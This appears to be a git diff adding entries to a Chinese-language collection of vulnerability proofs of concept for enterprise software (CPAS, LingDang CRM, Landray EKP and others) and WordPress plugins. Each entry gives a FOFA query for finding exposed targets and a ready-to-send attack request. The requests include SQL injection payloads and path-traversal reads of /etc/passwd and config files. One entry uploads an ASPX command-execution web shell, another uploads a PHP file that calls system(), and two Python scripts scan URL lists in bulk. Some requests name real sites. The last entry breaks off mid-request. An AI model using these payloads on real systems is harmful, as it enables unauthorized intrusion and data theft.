20241228更新

README.md

@@ -47,6 +47,28 @@
 </div>
 
 
+## 2024.12.28 新增漏洞
+
+- [CPAS审计管理系统存在任意文件读取漏洞](./北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md)
+- [CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞](./北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md)
+- [WordPress插件rtw_pdf_file任意文件读取漏洞](./WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md)
+- [WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)](./WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md)
+- [WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)](./WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md)
+- [灵当CRM系统接口getMyAmbassador存在SQL注入漏洞](./灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md)
+- [灵当CRM系统接口uploadfile文件上传漏洞](./灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md)
+- [卓软计量业务管理平台image.ashx任意文件读取漏洞](./华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md)
+- [博斯外贸管理软件loginednew.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md)
+- [博斯外贸管理软件logined.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md)
+- [安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞](./安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md)
+- [勤云远程稿件处理系统存在SQL注入漏洞](./北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md)
+- [赛诸葛数字化智能中台系统login存在SQL注入漏洞](./赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md)
+- [网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞](./网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md)
+- [朗速ERP系统FileUploadApi.ashx存在文件上传漏洞](./朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md)
+- [月子会所ERP管理云平台GetData.ashx存在SQL注入](./武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md)
+- [科汛新职教网校系统CheckOrder存在SQL注入漏洞](./科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md)
+- [虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞](./虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md)
+- [蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞](./蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md)
+
 ## 2024.12.21 新增漏洞
 
 - [蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞](./蓝凌OA/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md)

WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md

@@ -0,0 +1,116 @@
+# WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)
+
+WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件，在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+"wp-content/plugins/wp-file-upload"
+```
+
+## poc
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import time
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        urls = file.read().splitlines()
+    return urls
+
+def extract_version(version_text):
+    match = re.search(r'<strong>Version\s+([0-9]+\.[0-9]+\.[0-9]+)</strong>', version_text)
+    if match:
+        version = match.group(1).strip()  
+        print(f"Found version: {version}")
+        return version
+    return None
+
+def version_to_tuple(version):
+    return tuple(map(int, version.split('.')))
+
+def compare_versions(current_version, target_version='4.24.11'):
+    if current_version:
+        current_tuple = version_to_tuple(current_version)
+        target_tuple = version_to_tuple(target_version)
+        
+        if current_tuple <= target_tuple:
+            print(f"\033[32mVersion {current_version} <= {target_version} - 可能存在漏洞\033[0m")
+            return True
+        else:
+            print(f"Version {current_version} > {target_version} - 无漏洞.")
+            return False
+    return False  
+
+def check(url):
+    protocols = ['http://', 'https://']
+    found_vulnerabilities = False
+
+    for protocol in protocols:
+        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
+        print(f"Checking {target_url}wp-content")
+        
+        timestamp = str(int(time.time()))
+        
+        target_url = urljoin(target_url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce")
+        target_url_version = urljoin(target_url, "/wp-content/plugins/wp-file-upload/release_notes.txt")
+        
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
+            "Cookie": f"wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ={timestamp}; wfu_ABSPATH=/;"
+        }
+        headers_version = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
+        }
+
+        try:
+            response_version = requests.get(target_url_version, verify=False, headers=headers_version, timeout=10)
+
+            if response_version.status_code == 200:
+                version_text = response_version.text
+                version = extract_version(version_text)
+                
+                if compare_versions(version):
+                    response = requests.get(target_url, verify=False, headers=headers, timeout=10)
+                    if response.status_code == 200 and all(key in response.text for key in ('/bin/bash', 'root:x:0:0')):
+                        print(f"\033[31mFind: {url}: WordPress_FileUpload (CVE-2024-9047) - ReadAnyFile!\033[0m")
+                        found_vulnerabilities = True
+                else:
+                    print(f"版本不匹配跳过检查{url}.")
+            else:
+                print(f"找不到版本号 {url}.")
+
+        except Exception as e:
+            print(f"Error while checking {url}: {e}")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="WordPress 任意文件读取漏洞检测")
+    parser.add_argument("-u", "--url", help="单个url检测")
+    parser.add_argument("-f", "--txt", help="批量检测")
+    args = parser.parse_args()
+    
+    url = args.url
+    txt = args.txt
+    
+    if url:
+        check(url)
+    elif txt:
+        urls = read_file(txt)
+        for url in urls:
+            check(url)
+    else:
+        print("help")
+```
+
+![image-20241227214033657](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272140753.png)
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-2024-9047-PoC/blob/main/WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py

WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md

@@ -0,0 +1,98 @@
+# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)
+
+WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞，原因是用户提供的参数未进行充分的转义处理，而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询，从而从数据库中提取敏感信息。
+
+## fofa
+```javascript
+body="/wp-content/plugins/tutor/"
+```
+
+## poc
+```javascript
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: academy.keune.ch
+Content-Type: application/x-www-form-urlencoded
+
+action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+-
+```
+
+访问网站查看源码，获取_tutor_nonce的参数
+
+![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png)
+
+![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png)
+
+## python脚本
+
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        return file.read().splitlines()
+        
+def check_sql_injection(url):
+    target_url = url.rstrip("/")
+    target_url_tutor_nonce = urljoin(target_url, "")
+    print(target_url_tutor_nonce)
+    target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
+
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15",  
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+
+    tutor_nonce = None
+
+    try:
+        response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15)
+        
+        match = re.search(r'"_tutor_nonce":"(\w+)"', response.text)
+        if match:
+            tutor_nonce = match.group(1)
+            print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m")
+            
+        if tutor_nonce:
+            payloads = f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-"
+            
+            
+            response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads)
+            if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']):
+                print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m")
+                return True
+
+    except requests.RequestException as e:
+        print(f"Error checking {url}: {e}")
+
+    return False
+
+def main():
+    parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.")
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument("-u", "--url", help="Target URL")
+    group.add_argument("-f", "--file", help="File containing URLs")
+
+    args = parser.parse_args()
+
+    if args.url:
+        check_sql_injection(args.url)
+    elif args.file:
+        urls = read_file(args.file)
+        for url in urls:
+            check_sql_injection(url)
+
+if __name__ == "__main__":
+    main()
+```
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42

WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md

@@ -0,0 +1,22 @@
+# WordPress插件rtw_pdf_file任意文件读取漏洞
+
+WordPress插件rtw_pdf_file任意文件读取漏洞，适用于 WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击，包括 1.7.5 rtw_pgaepb_dwnld_pdf（） 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容，其中可能包含敏感信息。
+
+## fofa
+```javascript
+"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder"
+```
+
+## poc
+```javascript
+GET /?rtw_pdf_file=../../../wp-config.php&rtw_generate_pdf=1 HTTP/1.1
+Host: korurealestate.co.uk
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241227211927240](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272119351.png)

北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md

@@ -0,0 +1,22 @@
+# 勤云远程稿件处理系统存在SQL注入漏洞
+
+勤云远程稿件处理系统 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="北京勤云科技"
+```
+
+## poc
+```javascript
+GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20'0:0:5'--/article/abstract/1 HTTP/1.1
+Host: 
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![image-20241227220754753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272207815.png)

北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md

@@ -0,0 +1,24 @@
+# CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞
+
+友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+body="/cpasm4/static/cap/font/iconfont.css"
+```
+
+## poc
+```javascript
+POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ
+```
+
+![image-20241227215623148](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272156212.png)

北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md

@@ -0,0 +1,22 @@
+# CPAS审计管理系统存在任意文件读取漏洞
+
+CPAS审计管理系统存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+icon_hash="-58141038"
+```
+
+## poc
+
+```javascript
+GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+

华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md

@@ -0,0 +1,19 @@
+# 卓软计量业务管理平台image.ashx任意文件读取漏洞
+
+卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+icon_hash="-334571363"
+```
+
+## poc
+```javascript
+GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241227214332200](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272143297.png)

博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md

@@ -0,0 +1,25 @@
+# 博斯外贸管理软件logined.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 logined.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+POST /log/logined.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe
+```
+
+![image-20241227215420546](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272154610.png)

博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md

@@ -0,0 +1,21 @@
+# 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 loginednew.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+GET /loginednew.jsp?welcome=%BB%B6%D3%AD%CA%B9%D3%C3%20%B2%A9%CB%B9%C8%ED%BC%FEV6.0(20110701)&systemname=BS&account=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28115%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28106%29%2BCHAR%2887%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28117%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2879%29%2BCHAR%2883%29%2BCHAR%2886%29%2BCHAR%28104%29%2BCHAR%2868%29%2BCHAR%2889%29%2BCHAR%28107%29%2BCHAR%2874%29%2BCHAR%2887%29%2BCHAR%2871%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EqLf&password=1&val=0000&availHeight=834&Safari=Y&loginurl= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241227215249023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272152097.png)

安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md

@@ -0,0 +1,26 @@
+# 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，通过关联分析、超限分析、停电分析、停限产分析，结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况，同时通过数据分析还可以实时监控限产和停产整治企业运行状态，用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+POST /MainMonitor/GetEnterpriseInfoY HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+EnterpriseId=2107265665700008%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cuser%28%29%29%29and%27&Type=4
+```
+
+![image-20241227215812734](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272158792.png)

朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md

@@ -0,0 +1,44 @@
+# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞
+
+
+
+## fofa
+```javascript
+body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
+```
+
+## poc
+```javascript
+POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/jpeg
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227222402497](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272224571.png)

武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md

@@ -0,0 +1,21 @@
+# 月子会所ERP管理云平台GetData.ashx存在SQL注入
+
+月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
+```
+
+## poc
+```javascript
+GET /Page/BasicInfo/ashx/GetData.ashx?ChannelId=&ClientName=1&FitemId=null&Phone=1{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4798=4798) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)))-- uTFu)}}&RequestMethod=ApplyActivity&SaleId= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241227222800031](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272228089.png)

灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md

@@ -0,0 +1,25 @@
+# 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞
+
+灵当CRM系统接口getMyAmbassador存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+logincrm_userid=-1 union select user(),2,3#
+```
+
+![image-20241227212430930](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272124007.png)

灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md

@@ -0,0 +1,32 @@
+# 灵当CRM系统接口uploadfile文件上传漏洞
+
+灵当CRM系统接口uploadfile文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+file_info={"name":"1.php"}&<?php system("whoami");unlink(__FILE__);?>
+```
+
+![image-20241227212839673](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272128744.png)
+
+文件路径
+
+```
+/crm/storage/2024/December/week4/回显文件名.php
+```
+

科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md

@@ -0,0 +1,26 @@
+# 科汛新职教网校系统CheckOrder存在SQL注入漏洞
+
+科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="/KS_Inc/static/edu"
+```
+
+## poc
+```javascript
+POST /webapi/APP/CheckOrder HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: application/json, text/javascript, */*; q=0.01
+Priority: u=0
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+
+{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}
+```
+
+![image-20241227223044294](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272230369.png)

蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md

@@ -0,0 +1,166 @@
+# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
+
+蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+app="Landray-OA系统"
+```
+
+## poc
+
+访问save方法，填充一下数据库
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+
